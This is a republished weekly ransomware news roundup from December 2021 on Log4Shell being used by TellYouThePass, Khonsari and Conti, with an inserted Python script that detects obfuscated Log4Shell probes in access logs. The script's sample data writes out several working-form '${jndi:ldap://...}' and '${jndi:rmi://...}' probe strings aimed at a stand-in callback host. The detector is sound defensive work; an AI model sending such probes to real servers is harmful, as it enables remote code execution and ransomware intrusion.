Privacy Ninja

The Week in Ransomware – December 17th 2021 – Enter Log4j

A critical Apache Log4j vulnerability took the world by storm this week, and now it is being used by threat actors as part of their ransomware attacks.

Last Friday, a researcher publicly released an exploit for the Log4j vulnerability, dubbed ‘Log4Shell’, after it had already been seen targeting vulnerable Minecraft servers.

While a patch was quickly released to fix the vulnerability, researchers and threat actors immediately began scanning for and exploiting vulnerable devices. Given how quickly the exploit was adopted, it was only a matter of time until threat actors used it to deploy ransomware.

It didn’t take long, as threat actors revived an old ransomware named TellYouThePass on Monday and began distributing it via Log4j exploits.


Soon after, another ransomware (or wiper) called Khonsari was discovered, which we later learned was targeting vulnerable Minecraft servers.

Finally, a report today shows how the Conti ransomware gang is using the Log4j vulnerability to quickly gain access to internal VMware vCenter servers and encrypt virtual machines.
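The Log4Shell probes described above arrive as `${jndi:...}` lookup strings in request fields that end up in logs (User-Agent, URL paths, headers), and scanners routinely hide them behind URL encoding and nested lookups such as `${lower:j}` or `${::-j}`. The following Python is an added example, not code from the article or from BleepingComputer, showing how to normalise those obfuscations before matching so a simple log sweep still catches them. The access-log lines and IP addresses are constructed for the example; the regexes are the assumption here and cover the common obfuscation forms, not every possible one.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the article). Line 0 is benign;
# lines 1-3 imitate Log4Shell probes: plain, URL-encoded with a ${lower:} lookup,
# and built entirely from ${::-x} default-value lookups.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [11/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:10:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:10:02:15 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    'ldap%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [11/Dec/2021:10:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.23/a}"',
]

# ${lower:X} / ${upper:X} resolve to X (case conversion is irrelevant for matching).
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# ${<anything>:-X} is a lookup with a default value; an unknown key yields X.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Once normalised, a probe reads ${jndi:<protocol>:...}; capture the protocol.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<proto>[a-z]+)\s*:", re.I)


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups until nothing changes."""
    prev = None
    while text != prev:
        prev = text
        text = urllib.parse.unquote(text)
        text = CASE_LOOKUP.sub(r"\1", text)
        text = DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def detect(line: str):
    """Return protocol and the normalised probe snippet, or None if clean."""
    norm = normalize(line)
    match = JNDI.search(norm)
    if not match:
        return None
    return {
        "protocol": match.group("proto").lower(),
        "normalized": norm[match.start(): match.start() + 80],
    }


def scan(lines):
    """Return (index, hit) pairs for every line that carries a JNDI probe."""
    hits = []
    for idx, line in enumerate(lines):
        hit = detect(line)
        if hit:
            hits.append((idx, hit))
    return hits


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {hit['protocol']} lookup -> {hit['normalized']}")
```

A hit only shows that someone sent a probe, not that the host was vulnerable or that the callback to the attacker's LDAP/RMI server succeeded; outbound connections from the application host to the addresses embedded in the lookup are the stronger signal, and patching Log4j remains the actual fix.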

Other ransomware news

While the Log4j vulnerability has taken up most of the cybersecurity community’s time this week, there have been other significant developments as well.

Romanian police arrested a ransomware affiliate for hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide.

Emotet also began distributing Cobalt Strike beacons as a primary payload, allowing ransomware gangs quicker access to compromised networks to conduct attacks.

We also learned that the Hive Ransomware operation is becoming a major player after breaching hundreds of companies in just four months.

Finally, a massive ransomware attack against HR services provider Kronos has caused significant disruption for the many companies that rely on it for timekeeping and payroll. We also saw a Conti attack on McMenamins breweries, showing that nothing is sacred.

Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @DanielGallagher, @PolarToffee, @jorntvdw, @malwrhunterteam, @demonslay335, @VK_Intel, @malwareforme, @serghei, @Seifreed, @FourOctets, @struppigel, @Ionut_Ilascu, @fwosar, @BleepinComputer, @billtoulas, @SANGFOR, @CuratedIntel, @80vul, @1ZRR4H, @AdvIntel, @MsftSecIntel, @GroupIB_GIB, @Bitdefender_Ent, @Cryptolaemus1, @JRoosen, @BroadcomS, @fbgwls245, @Amigo_A_, @JakubKroustek, and @pcrisk.

December 11th 2021

New STOP Ransomware variant

Jakub Kroustek found a new STOP ransomware variant that appends the .yjqs extension to encrypted files.


December 13th 2021

Police arrest ransomware affiliate behind high-profile attacks

Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors.

Kronos ransomware attack may cause weeks of HR solutions downtime

Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of its cloud-based solutions for weeks.

December 14th 2021

New ransomware now being deployed in Log4Shell attacks

The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.

New White Rabbit ransomware

Michael Gillespie is looking for a sample of the new White Rabbit ransomware that appends the .scrypt extension.


December 15th 2021

Emotet starts dropping Cobalt Strike again for faster attacks

Right in time for the holidays, the notorious Emotet malware is once again directly installing Cobalt Strike beacons for rapid cyberattacks.

New STOP Ransomware variant

PCrisk found a new STOP ransomware variant that appends the .Shgv extension to encrypted files.

December 16th 2021

Hive ransomware enters big league with hundreds breached in four months

The Hive ransomware gang is more active and aggressive than its leak site shows, with affiliates attacking an average of three companies every day since the operation became known in late June.

McMenamins breweries hit by a Conti ransomware attack

Portland brewery and hotel chain McMenamins suffered a Conti ransomware attack over the weekend that disrupted the company’s operations.

Microsoft: Khonsari ransomware hits self-hosted Minecraft servers

Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.

Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware

Symantec, a division of Broadcom Software, tracks this ransomware as Ransom.Noberus and our researchers first spotted it on a victim organization on November 18, 2021, with three variants of Noberus deployed by the attackers over the course of that attack. This would appear to show that this ransomware was active earlier than was previously reported, with MalwareHunterTeam having told BleepingComputer they first saw this ransomware on November 21.

New STOP Ransomware variant

PCrisk found a new STOP ransomware variant that appends the .hudf extension to encrypted files.

December 17th 2021

Conti ransomware uses Log4j bug to hack VMware vCenter servers

The Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

Logistics giant warns of BEC emails following ransomware attack

Hellmann Worldwide is warning customers of an increase in fraudulent calls and emails regarding payment transfer and bank account changes after a recent ransomware attack.

TellYouThePass ransomware revived in Linux, Windows Log4j attacks

Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.

New Dharma Ransomware variant

dnwls0719 found a new Dharma ransomware variant that appends the .C1024 extension to encrypted files.

That’s it for this week! Hope everyone has a nice weekend!
